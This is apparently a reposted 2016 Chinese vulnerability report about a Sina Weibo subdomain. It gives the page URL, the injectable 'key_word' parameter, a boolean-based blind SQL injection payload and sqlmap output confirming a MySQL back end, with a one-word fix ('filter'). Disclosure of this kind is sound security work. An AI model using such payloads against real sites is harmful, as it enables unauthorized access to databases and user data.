IT技术互动交流平台

新浪微博某分站存在SQL注入漏洞

作者:佚名  发布日期:2016-03-03 21:27:16

新浪微博某分站存在SQL注入

网址:http://xueyuan.weibo.com/course/index?categoryid=&orderby_fild=3&orderby_operate=desc&key_word=¤t_type=0 参数:key_word
GET parameter 'key_word' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] n
sqlmap identified the following injection points with a total of 9 HTTP(s) reque
sts:
---
Place: GET
Parameter: key_word
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoryid=&orderby_fild=3&orderby_operate=desc&key_word=%'and(1=1
AND 2283=2283)and'%'='¤t_type=0
---
[10:25:40] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[10:25:40] [INFO] testing MySQL
[10:25:44] [INFO] confirming MySQL
[10:25:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0

修复方案:
过滤
 

Tag标签: 新浪   漏洞   分站  
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规